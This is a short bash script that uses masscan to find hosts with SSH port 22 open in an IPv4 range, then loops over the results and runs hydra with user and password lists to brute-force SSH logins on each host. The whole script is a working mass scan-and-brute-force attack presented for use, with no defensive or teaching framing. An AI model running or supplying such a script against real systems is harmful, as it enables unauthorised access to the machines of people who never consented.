#!/bin/bash

# Scan IPv4 range on port 22
echo -e "Start scanning ...\n"
masscan 0.0.0.0/24 -p22 --exclude 255.255.255.255 | awk '{print $6}' > result.txt
echo -e "\nEnding scanning !\n"

# Brute force
echo -e "\nStart brute force ...\n"
IFS=$'\n'
for ip in $(cat result.txt)
do

  hydra -L users.txt -P passwords.txt ssh://$ip

done

exit 0
